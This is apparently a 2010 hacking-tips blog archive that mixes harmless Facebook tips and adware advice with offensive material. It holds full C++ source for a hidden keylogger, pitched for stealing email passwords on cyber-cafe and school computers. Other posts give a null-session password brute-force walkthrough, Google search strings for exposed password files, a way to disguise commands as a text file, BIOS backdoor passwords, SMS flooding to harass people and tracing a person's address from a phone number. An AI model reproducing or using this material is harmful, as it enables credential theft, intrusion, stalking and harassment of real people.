Monday, October 25, 2010

Flash games uploaded recently- Small pack


DOWNLOAD 10 GAME (SMALL PACK)
5.7 Mb only



ENJOY ..!!

Saturday, October 16, 2010

10 Cool Facebook Tips and Tricks

1 HOW TO: Add a Dislike Option to Your Status Update

Like” buttons are everywhere on Facebook, and they’re everywhere on the web. But what if you want to update your status or share something that your friends can “dislike?” We know, your friends can choose to “comment” on your post, but where’s the fun in that?
The clever Status Magic Facebook app can add a dislike button to any status updates posted via the app. And if you wanted to really mix it up you can actually customize the second emotion to anything, such as “love,” “hate,” “disagree” or even “LOLs.”

2. HOW TO: Hide Status Updates From Certain People







Using Facebook’s general privacy settings (find these by hitting “account” on the top right of a Facebook page) you can select whether everyone, just friends or friends of friends can see your status updates. However, there is a way to narrow those options down even further.
You can select specific friend lists to see your status (relevant for work, special interest groups, etc.) or even individual people by name, which is useful for anyone organizing a surprise party.
To take advantage of these options, click the padlock icon just below your “what’s on your mind” box on your wall and a drop down menu should appear. Selecting “customize” will bring up more options such as “make this visible to” and “hide from” with the option to make your selection a default.

3. HOW TO: Pre-Schedule Status Updates





While SocialOomph, Sendible and HootSuite() offer the same kind of service, the simplest way to schedule Facebook status updates is by using the easy, free Later Bro service.
Just sign in with Facebook Connect, select your time zone, type in what it is you’d like to say, set the calendar and clock to when you’d like to say it, and presto!

4. HOW TO: Tag People in Your Status Updates





This was quite a big deal when it was announced this past September, but from the amount of searches on the topic “how can I make someone’s name go blue in a Facebook status?” it seems it’s not universally known.
To mention someone in a status update just type “@” (a la Twitter()) in the status bar and start typing their name as it appears on Facebook. An auto-generated list will then come up with people in your social circle whose name starts with the letters you’ve typed. The feature also works with pages, brands, events and companies.
Hit the name you want, complete the update, click share and the name will become a hyperlink (you won’t see the @ symbol) and will appear in blue text.

5. HOW TO: Add Symbols to Your Facebook Status


Although there are plenty of emoticons that work with Facebook Chat, typing “:)” into Facebook’s status bar will not magically transform into a smiley yellow face. In fact, the only symbol you can create in a Facebook status update through the shortcut keys is a ♥, by typing “<3."
While this won't bother many Facebook users, others more used to punctuating their missives can copy and paste web-happy, universal symbols into the box, as you can see in the screengrab above.
PC users can also access some symbols by hitting “alt” + various number combinations (on a numerical keypad). So, while smileys are yet to hit Facebook statuses, you can annoy or amuse your buddies with symbols right now.

6. HOW TO: Turn Your Status Updates Into a Word Cloud





There’s a really fun way to visualize anyone’s status updates (even an entire country’s) as a word cloud. The Status Analyzer 3D app will look at what it is you’ve been chatting about lately and generate a list, and then a pretty, colorful, animated cloud as pictured above.
You can share the results with others on the social networking site by posting it to your friends’ walls or by adding it to your profile.

7. HOW TO: Have Fun With Facebook’s Humorous Language Options





While you can always change your setting into more sensible alternative languages, the site offers a couple of fun linguistic Easter eggs.
You can chose to have Facebook display upside down English, or, for anyone feeling a little salty, in “pirate.” Pirate essentially turns your status into your “plank,” your attachments into “loot” and instead of “share” it offers the option to “blabber t’ yer mates.”
Sadly, anything you type in the status bar won’t be upside down, or pirate-y. But with the use of some external sites you can achieve the same effect.
TypeUpsideDown.com and UpsideDownText.com are just two examples of sites that can flip your text, while the Talk Like a Pirate Day site can help you with your pirate translations.

8. HOW TO: See Status Updates From Around the World





If you want to get a glimpse of the thoughts of Facebook users from around the world’s, head over to OpenBook.
Created by three San Fran web developers with a serious privacy message in mind, the site aggregates the status updates of everyone whose privacy levels are set to “everyone.”
You can narrow your searchable results down by gender and keywords to find out what people are saying about a certain topic. Or you can just browse the recent searches.

9. HOW TO: See Your Status Update Stats





Have you ever wondered how many times you have updated your status on Facebook? The Facebook app Status Statistics, can tell you this and more.
The app analyzes your updates and gives you a tidy list of how many you’ve written, the average word count and how many times a day you post. In addition, it generates a graph that shows you what time of day or what days of the week you normally update.
Old statuses are also searchable via the app, so you can find that witty retort you made back in November 2009 without having to scroll back through your history.

10. HOW TO: Play a Trick On Your Friends in Your Status Update





This clever link “http://facebook.com/profile.php?=73322363″ looks like it could be a URL for anyone’s Facebook profile, actually takes anyone logged into Facebook to their own profile page.
If you try it out, be sure to remove the link preview that Facebook auto-ads. Have fun, and don’t be too mean

Friday, October 15, 2010

Trace Location Of A Phone From Any BSNL Mobile Number

Do You Wanna know the Address of the girl you like?, or address of your friend?. It is so easy to trace the addresses, just you need is their phone number.EXAMPLE: For tracing the address of a number located in andhra(India) just log in to




After logging in, select the area (city) to which the phone number belong and then proceed further.In the option "Search by" , select Telephone number. select the station to which the phone no. belongs and finally write the phone number in the "Search key field" . In this way the address of that particular number will be traced.
For selecting any other state of India, log on to http://www.bsnl.co.in/index.html . In the Right hand side you see the "BSNL units" option (above Username field), select your state from the menu and then proceed further.
NOTE : Try both, number including (2) as well as number excluding (2) as a prefix

how does yahoo booter works

Yahoo messenger can get into yahoo chat, but in reality, it’s a seperate service…

Yahoo Messenger’s server has a Buffer, this buffer is actually 128k not the 512k.

When the attacker sends multiple packets to you, what you don’t get from the server gets stored in a buffer, in comes a chat packet, the client grabs it, in comes 5 chat packets, you grab the first 3 packets, 2 are left behind on yahoo’s server, you then grab the 2 packets and then the buffer is back to empty.


Actually the booter sends 1k’s worth in 1 packet of PM (instant messaging packets) but instead of sending the 1 packet, the booter builds up 10 pm/im packets.

Then you send it to yahoo 10 loops packets of PMs @ 1k each = 80k in 1 load to yahoo then the booter sends it again, 160k.

Now if you can send 128k’s worth of data, pm packets, chat packets, anything you like to the other user BEFORE the user can get the data out, yahoo will simply disconnect them over 128k why?

Most Probably because the server is instructed to disconnect idle users or users who are no longer online, what’s the point of Keeping someone in yahoo chat if they are not getting the data people are sending them, after 40 minutes of a client sending data yahoo goes, we’ve buffered 128k, the user aint there, kick him…!

In Short, Yahoo Messenger Would Crash if it got anything more than 128k.

Also the connection protocols YMSG and Chat2 which is also a factor. YChat was harder to boot for the simple fact that it lacked in features compared to YMSG.
This is also why YMSG is easier to boot then Chat2. The more features the more ways you can be booted.

Yes there are ways to prevent from being booted

How To Use pen Drive Even If It is Locked in Colleges, Offices Etc.

. By Disabling USB Ports from Device Manager
i) Go to Start > Run, in run prompt type “devmgmt.msc” and press enter.

ii) Go to Universal Serial bus Controller. See if there are any red colored cross? If yes, right click and enable those USB Ports.


Now try and use the pen drive.

2. Correct Registry Value for USB Mass Storage device

i) Go to Start > Run , type “regedit” and press enter.

ii) Navigate to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

iii) Double-click on the “Start” key to modify its value, change the value to 3 and press OK.
Now remove and connect the pen drive again, it should work fine, else its driver are missing

Thursday, October 14, 2010

Task Manager, Regedit and Folder Options Disabled by Virus ??

All must be aware of this problem caused by a virus called “Brontok”. Sometimes after removing the virus completely from our system, you’ll still face some problems such as you can no longer bring up Windows Task Manager from CTRL+ALT+DEL. You get the error message saying “Task Manager has been disabled by your administrator....









If You think that it’s easy to fix this problem by going to Registry Editor, you can’t! You'll get a error message “Registry editing has been disabled by your administrator”.









Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don’t worry, here’s how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.

Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.

Here’s a free tool called Remove Restrictions Tool (RRT) which is able to re-enables all what the virus had previously disabled, and gives you back the control over your own computer.


Remove Restrictions Tool is able to re-enable:
- Registry Tools (regedit)
- Ctrl+Alt+Del
- Folder Options
- Show Hidden Files

Small and easy to use. Make sure you boot in to Safe Mode to use Remove Restrictions Tool (RRT).

http://rapidshare.com/files/79783905/RRT.exe

Wednesday, October 13, 2010

sms bombing

Application to send multiple SMS messages .at same instant.. so be carefull using it

itzz used to flood/spam any number.you can send almost any amount of messages instantly.i m using it to desturb my friends.

your messages should be unlimited or it may cost you.

for  android phones go to android market from your cell phone and search for text flooder.then install it.
(100 % working tested)or here

for symbian based phones dowload sms flooder from here

Tuesday, October 12, 2010

Stuxnet worm

A sophisticated worm designed to steal industrial secrets and disrupt operations . the worm was discovered in July when researchers at VirusBlokAda found it on computers in Iran.The worm, was designed to attack Siemens industrial control systems.Stuxnet could be used to cause a significant amount of damage if it is not properly removed.Researchers at Symantec have cracked Stuxnet's cryptographic system, and they say it is the first worm built not only to spy on industrial systems, but also to reprogram them

Once installed on a PC, Stuxnet uses Siemens' default passwords to seek out and try to gain access to systems that run the WinCC and PCS 7 programs -- so-called PLC (programmable logic controller) programs that are used to manage large-scale industrial systems on factory floors and in military installations and chemical and power plants.this malware spreads with the help of us drive or lan

Monday, October 11, 2010

How To Find Vulnerable Web Apps With Google : Web Application Hacking

Search engines index a huge number of web pages and other resources. Hackers can use these engines to make anonymous attacks, find easy victims, and gain the knowledge necessary to mount a powerful attack against a network. Search engines are dangerous largely because users are careless. Further, search engines can help hackers avoid identification. Search engines make discovering candidate machines almost effortless. Listed here are a few common hacks performed with http://www.google.com (which is our favorite search engine, but you can use one of your own choosing if you'd like, assuming it supports all the same features as Google).

To find unprotected /admin, /password, /mail directories and their content, search for the following keywords in http://www.google.com:
  • "Index of /admin"
  • "Index of /password"
  • "Index of /mail"
  • "Index of /" +banques +filetype:xls (for France)
  • "Index of /" +passwd
  • "Index of /" password.txt













To find password hint applications that are set up poorly, type the following in http://www.google.com (many of these enumerate users, give hints for passwords, or mail account passwords to an e-mail address you specify!):
  • password hint
  • password hint -email
  • show password hint -email
  • filetype:htaccess user







To find IIS/Apache web servers with FrontPage installed, type the following in http://www.google.com (run the encrypted password files through a password cracker and get access in minutes!):

         administrators.pwd index
         authors.pwd index
          service.pwd index
          allinurl:_vti_bin shtml.exe




To find the MRTG traffic analysis page for websites, type the following in http://www.google.com:
  • inurl:mrtg







To get access to unprotected global.asa(x) files or to get juicy .NET information, type the following in http://www.google.com:
  • filetype:config web (finds web.config)
  • global.asax index (finds global.asax or global.asa)






To find improperly configured Outlook Web Access (OWA) servers, type the following in http://www.google.com:
  • inurl:exchange inurl:finduser inurl:root

Sunday, October 10, 2010

How To hack A Computer In A LAN By Creating a Null Session

Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.



I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory



You now need to create a null session to the target computer.



Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.



We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.



Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.



Prepare yourself a good wordlist.

  

Now put both of them in the same directory with the NetBios Auditing Tool.




Press on enter and the tool will run through the passlist.





In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.



After you press enter,it will prompt you for the username and password.



Therefore,just input them inside the prompt and continue.



Target C drive will be on your screen.






In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139

Saturday, October 9, 2010

How To Hide Your Malicious Code Into A Simple Scrap Document

Malicious code (also called vandals) is a new breed of Internet threat that cannot be efficiently controlled by conventional antivirus software alone. In contrast to viruses that require a user to execute a program in order to cause damage, vandals are auto-executable applications

As Very understood, a simple user would not Open Any malicious file untill or unless he is forced or Phished to do so.
Therefore, Here is The way How to Create a Malicious code Within an scrap document so that A SImple user Cannot Identify It.
  1. Make a copy of Notepad.exe and place it on your desktop.
  2. Open Wordpad.
  3. Click and drag the copy of Notepad.exe you placed on the desktop into the open Wordpad document.
  4. Next, click on Edit, Package Object, Edit Package.
  5. Then click on Edit, Command Line.
  6. At the command-line prompt, type a command such as dir c: /p; then click on OK.
  7. You can now change the icon if so desired.
  8. Exit from the edit window, and the document will be updated.
  9. Click and drag Notepad.exe back to the desktop.
  10. The file will have taken the name Scrap; rename it ImportantMessage.txt.
  11. Click on ImportantMessage.txt and observe the results. You should notice that the scrap produced a directory listing of the C drive. If you were a malicious hacker, you could have just as easily set up the command to reformat the hard drive or erase all the system files.
 

Friday, October 8, 2010

How To Byepass BIOS Passwords

Introduction to BIOS Passwords

The best method to reset a BIOS password depends on what BIOS the computer has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.
Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.
The general categories of solutions to reset a BIOS password are:
  • Using a Backdoor BIOS Password
  • Resetting the BIOS Password using Software
  • Resetting the BIOS Password using Hardware
  • Vendor Specific Solutions for resetting the BIOS Password

 

 

 







Using a Backdoor BIOS Password

Some BIOS manufacturers implement a backdoor password. The backdoor password is a BIOS password that works, no matter what the user sets the BIOS password to. These passwords are typically used for testing and maintenance. Manufacturers typically change the backdoor BIOS passwords from time to time.

AMI Backdoor BIOS Passwords

Reported AMI backdoor BIOS passwords include A.M.I., AAAMMMIII, AMI?SW , AMI_SW, BIOS, CONDO, HEWITT RAND, LKWPETER, MI, and PASSWORD.

Award Backdoor BIOS Passwords

One reported Award backdoor BIOS password is eight spaces. Other reported Award backdoor BIOS passwords include 01322222, 589589, 589721, 595595, 598598 , ALFAROME, ALLY, ALLy, aLLY, aLLy, aPAf, award, AWARD PW, AWARD SW, AWARD?SW, AWARD_PW, AWARD_SW, AWKWARD, awkward, BIOSTAR, CONCAT, CONDO, Condo, condo, d8on, djonet, HLT, J256, J262, j262, j322, j332, J64, KDD, LKWPETER, Lkwpeter, PINT, pint, SER, SKY_FOX, SYXZ, syxz, TTPTHA, ZAAAADA, ZAAADA, ZBAAACA, and ZJAAADC.

Phoenix Backdoor BIOS Passwords

Reported Phoenix BIOS backdoor passwords include BIOS, CMOS, phoenix, and PHOENIX.

Backdoor BIOS Passwords from Other Manufacturers

Reported BIOS backdoor passwords for other manufacturers include:
ManufacturerBIOS Password
VOBIS & IBMmerlin
DellDell
BiostarBiostar
CompaqCompaq
Enoxxo11nE
Epoxcentral
FreetechPosterie
IWilliwill
Jetwayspooml
Packard Bellbell9
QDIQDI
SiemensSKY_FOX
SOYOSY_MB
TMCBIGO
ToshibaToshiba
Remember that what you see listed may not be the actual backdoor BIOS password, this BIOS password may simply have the same checksum as the real backdoor BIOS password. For Award BIOS, this checksum is stored at F000:EC60.

Resetting the BIOS Password using Software

Every system must store the BIOS password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the BIOS password. You must know the memory address where the BIOS password is stored, and the format in which the BIOS password is stored. Or, you must have a program that knows these things.
You can write your own program to read the BIOS password from the CMOS memory on a PC by writing the address of the byte of CMOS memory that you wish to read in port 0x370, and then reading the contents of port 0x371.
!BIOS will recover the BIOS password for most common BIOS versions, including IBM, American Megatrends Inc, Award and Phoenix.
CmosPwd will recover the BIOS password for the following BIOS versions:
  • ACER/IBM BIOS
  • AMI BIOS
  • AMI WinBIOS 2.5
  • Award 4.5x/4.6x/6.0
  • Compaq (1992)
  • Compaq (New version)
  • IBM (PS/2, Activa, Thinkpad)
  • Packard Bell
  • Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107
  • Phoenix 4 release 6 (User)
  • Gateway Solo - Phoenix 4.0 release 6
  • Toshiba
  • Zenith AMI

Resetting the BIOS Password using Hardware

If you cannot access the machine after if has been powered up, it is still possible to get past the BIOS password. The BIOS password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information (including the BIOS password) will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.
On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery. If you cannot locate this jumper, you might short both of the points where the battery connects to the motherboard.
If all else fails, you may have to clear the BIOS password by resetting the RTC (Real Time Clock) IC (Integrated Circuit) on your motherboard.
Many RTC's require an external battery. If your RTC is one of this type, you can clear the BIOS password just by unsocketing the RTC and reseating it.
RTC's which require external batteries include:








Most RTC chips with integrated batteries can be reset to clear the BIOS password by shorting two pins together for a few seconds.
You will see more than one option for some chips due to testing by various people in the field. Remember to remove power from the system before shorting these pins.
RTC ChipPins
Dallas DS1287ATI benchmarq bp3287AMT3 (N.C.) and 21 (NC/RCL)
Chips & Technologies P82C20612 (GND) and 32 (5V)-or-74 (GND) and 75 (5V)
OPTi F82C2063 and 26
Dallas Semiconductor DS12887A3 (N.C.) and 21 (RCLR)
You should be able to discover how to reset the BIOS password stored in most RTC (Real Time Clock) chips by reading the manufacturers data sheet for that RTC. Some RTC's, like the Dallas DS1287 and TI benchmarq bq3287mt cannot be cleared. The solution to resetting the BIOS password on systems with those RTC's is to purchase a replacement RTC chip.

How To Check Whether You are Victim of RATS or not ?

In this post i am going to show you how to find out when you are infected with a RAT or Keylogger, without using any complex tools. Now i believe most of you might know that you need to have an internet connection to make a RAT or a Keylogger work, which would mean, if you are not connected to internet, you don't have to worry about being infected with RAT or Keylogger. Ok, so for those who have internet connection and think they are being infected with a Trojan, here is a little guide that can solve your problem.

1. Now every program has their own process which can be seen on task manager. So the first thing to do is to find out which process the Trojan is being attached to. If you see some unknown process search that on google. A good hacker will always makes sure he hides its process with a Windows based Process, for eg. svchost.exe or something like that.

2. If you cant find, then the next thing you can do is use cmd (to open cmd prompt, Click on Start--->Accessories-->Command prompt).

3. Once Command Prompt is opened, use this command: netstat -an |find /i "listening"

Note: The NETSTAT command will show you whatever ports are open or in use, but it is NOT a port scanning tool!

Now we wonder What this Command does? This command will show all the opening ports. Now check for any unknown port.

4. You can skip step 3 if you want, and can do this instead.

Open command prompt and type netstat -b



Now this command will show you the active connections with the process with their PID (Process Identifier) and also the packets.
Look out for SYN Packets and the Foreign address its been connecting with , check the process its been associated with, check the ports also. If you find that its connecting to some unknown ports, then you can say you have been backdoored.

5. Go to your task manager. On the top of it, click on View---> select Column---> Tick on PID (Process Identifier).
Match the suspicious Process with the Processes In task manager, check PID also.
Now most of the RATs resides on Start up. How to delete them from start up?


a) Go to regedit ---> HKLM\Software\Microsoft\Windows\Current version\Run
On the Right hand side, check for the process name which you find on step 4. if its not their. Check at
HKCU\Software\Microsoft\Windows\Current Version\Run
OR
Open Cmd prompt & type start msconfig. Go to Startup tab, you can check the startup process there

Thursday, October 7, 2010

10 Tips to Avoid Getting Adware

10 Tips to Avoid Getting Adware

Adware, malware, spyware and viruses can bring your system to its knees. They are detrimental, lowering the performance of your computer. You might need to replace data. You might lose unique files. Keep the nasties away from your computer using these ten simple tips.
1. Use Firefox: Internet Explorer is the most popular browser on the market, controlling over 50% of the market share. The virus and adware creators specifically look for exploitable vulnerabilities within IE because they know that they will receive the best return on investment. Your switch to Firefox prevents some adware from infecting your machine.
2. Scan your PC once a week: Sometimes adware programmers take a sneaky approach. They will set up their programs to run quietly in the background to spy upon your activities. This once a week scan is necessary to remove any of those sneaky bugs.
3. Download from known sites: New sites for installing adware are popping up all the time. If you find something that you want to download, make sure that it is from a known site. A company like Amazon will not steer you wrong. If you are not sure whether you can trust a site, perform a quick search.
4. Install Adaware: Ad-Aware is the most popular free adware removal program on the market. It detects, quarantines and removes adware. It searches for other programs which may have been installed, highlighting them in an easy to use interface. This program does not have an anti-virus attached.
5. Do not click on unsolicited email: You are constantly receiving offers to increase this or improve that through unsolicited email. Your curiosity may be killing you, but don’t click on these emails. They accept your click as permission to install adware, spyware and malware on your PC.
6. Install Antivirus software: Installing two programs for virus and adware protection is a smart idea. It caters to the strengths of each program, increasing the overall strength of your antiadware and antiviral campaign. Some of the best antivirus software is free, providing real time protection. Programs to look at would be Avast Antivir and AVG.
7. Don’t install toolbars: Even some reputable sites install custom toolbars. They slow your system down and collect information about your surfing habits. While a toolbar might offer some perks, it may also diminish your experience by dragging your system to a halt. Toolbars from less reputable places install adware and sometimes infect your system outright.
8. Look at your task manager: If anything seems out of place with your computer, take a look at your task manager. This tells you about all of the programs and processes which are running on your computer. Examine the processes tab for anything which you don’t immediately recognize. Perform a web search for unfamiliar processes.
9. Do not click on popups: Clicking on a popup usually spells certain doom for your computer. It opens the door for the viruses and adware that want to infect your machine, telling these malicious applications to make themselves at home. Stay away from those constantly advertised screensavers and icons.
10. Trust your gut: If you don’t feel right about a site, don’t go there. If you are receiving warnings from the antivirus and antiadware programs which you’ve installed, don’t go there. If you don’t like the layout of a site, don’t go there. Trust your instincts about sites.
With proper vigilance, you can keep aggravating adware, spyware and malware from your machine. Trust your instincts. Install Ad-Aware and an antivirus program. Play it safe. The care you spend in preventing adware from infecting your machine can save money and time.

Tuesday, October 5, 2010

hacking passwords using keylogger


To hack any ones account just download the following software and double click on it .it will get installed on your computer.the  thing it  do is..... whatever user will type on keyboard all will be saved in a file called log.txt which is a text file ..means passwords will also be saved whenever user log in using internet.remember that log.txt will be saved there where you will keep virus file(the file you have downloaded).you can install this software in cyber cafes or in your college ,school computers by which you can hack many email ids..if u face any problem comment below.......

to create your own keylogger use following method...

                                      first download dev c++ from here

                                       How to install DevC++ and run .cpp file



                                             Launch Dev C++ ,
                                             Click on File-> New-> Project



Choose empty project, type name of project for example hackosys and select C++ Project



Right click on project name and click New File



after this will appear field where you should type code , to execute code click on Execute->Compile & Run or press F9

code 

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
 void Stealth();
 int main()
 {
 Stealth();
 char i;
 while (1)
 {
 for(i = 8; i <= 190; i++)
 {
 if (GetAsyncKeyState(i) == -32767)
 Save (i,"LOG.txt");
 }
 }
 system ("PAUSE");
 return 0;
 }
 /* *********************************** */
 int Save (int key_stroke, char *file)
 {
 if ( (key_stroke == 1) || (key_stroke == 2) )
 return 0;
 FILE *OUTPUT_FILE;
 OUTPUT_FILE = fopen(file, "a+");
 cout << key_stroke << endl;
 if (key_stroke == 8)
 fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
 else if (key_stroke == 13)
 fprintf(OUTPUT_FILE, "%s", "\n");
 else if (key_stroke == 32)
 fprintf(OUTPUT_FILE, "%s", " ");
 else if (key_stroke == VK_TAB)
 fprintf(OUTPUT_FILE, "%s", "[TAB]");
 else if (key_stroke == VK_SHIFT)
 fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
 else if (key_stroke == VK_CONTROL)
 fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
 else if (key_stroke == VK_ESCAPE)
 fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
 else if (key_stroke == VK_END)
 fprintf(OUTPUT_FILE, "%s", "[END]");
 else if (key_stroke == VK_HOME)
 fprintf(OUTPUT_FILE, "%s", "[HOME]");
 else if (key_stroke == VK_LEFT)
 fprintf(OUTPUT_FILE, "%s", "[LEFT]");
 else if (key_stroke == VK_UP)
 fprintf(OUTPUT_FILE, "%s", "[UP]");
 else if (key_stroke == VK_RIGHT)
 fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
 else if (key_stroke == VK_DOWN)
 fprintf(OUTPUT_FILE, "%s", "[DOWN]");
 else if (key_stroke == 190 || key_stroke == 110)
 fprintf(OUTPUT_FILE, "%s", ".");
 else
 fprintf(OUTPUT_FILE, "%s", &key_stroke);
 fclose (OUTPUT_FILE);
 return 0;
 }
 /* *********************************** */
 void Stealth()
 {
 HWND Stealth;
 AllocConsole();
 Stealth = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(Stealth,0);
 }

now execute this code


The content in this article is presented for educational purposes only
if you face any problem regarding tutorial then do write to us...

links


Post your url in comment box below to be added in our directory free of cost


Post Your Link Free Link Directory
Submit your ad to our free link directory. Our free link directory offer both free and paid submissions. Your choice. Get your link noticed not only by traffic but by search engines. Have better search engines ranking.
BookmarksMe - HiTech Info
show you all about information of hight technology
Forex Signals
forex signals
TopBlogDir.blogspot.com button
Dolls Clothes
Dolls Clothes is an Australian online store selling hand made doll clothing. We have a fantastic range of Baby Born, Baby Chou Chou and Baby Annabell Dolls Clothes Doll Clothes
Best Online Dating Service
The site presents an International matchmaking service, which helps to find new friends, associates, soul mates either for fun or for more serious relationship. You can communicate with other members by means of the portal's privately hosted e-mail system to find out more about each other and develop a relationship.
Bid And Buy Online Auctions
Buy and sell almost everything. Electronics, cars, clothing, gaming, collectibles, sporting, computing and everything else at Bid And Buy Online Auctions. Sign up we will give you $18 credit. Begin to buy and sell at auction today.

Free Online Game Shop
Tons of free online flash and java games!Free Online Games, Arcade Games, Flash Games, Java Games, Free Games, Multiplayer Games, Action Games | has the fighting games, sports games, action games, puzzle games, casino games, shooting games, flying games, racing games, classic games, and much much more! Many games have high scores in which you can compete with others. Earn points to excel on the site and increase your rank.

Free-writing
Free Write , Free Theme And Publish It AnyTime AnyWhere
Acne Free in 3 Days
Acne treatment and product reviews. We have reviewed acne medications; acne treatment and skin care products, creams, gels and lotions on the market

Asian-Dove
Dating beautiful Asian Girls The number one dating web site in Asia

Abrasives Adhesives and Diamond Tools for Granite Marble and Concrete Importers Wholesale to Distributors
DIAMONDHEAD USA provides professional quality abrasives and diamond tools such as diamond polish pads, grinding stones and sandpaper for marble polishing.Your source for Granite, Marble and Concrete Abrasives Adhesives and Tools Wholesale to Stone Tool Distributors, Industrial Abrasive Distributors, Home Improvement Centers. Granite and concrete abrasives Our brands include SIa Abrasives, Blue Line sandpaper, Black Diamond Sealers and Cleaners

Downloads
Software, ebooks and scripts

Multidimensions.Net Social Network
Free classifieds, personals, radio, chat rooms and forums

Bvlgarifm.com
Vanzare produse parfumerie in sistem MLM

http://tecnologia-marcom.blogspot.com
Bienvenido a la era de la tecnologia donde encontrara diversos temas de interes medio ambiental y sus relevancia a traves de diferentes punto de vista.

Link Exchange
Vote for my site!
Video Time- Time to watch, share or make videos
We offer a way of expressing yourself. You can make a mini clip or an instructional flick then upload it to our website. You can share with your friends, classmates, employees, etc.

http://www.linkspro.com/
http://tangapro.blogspot.com/
http://www.blogexplosion.com/index.php?ref=chakshu00grg
 http://www.blogcatalog.com/directory/technology/computers/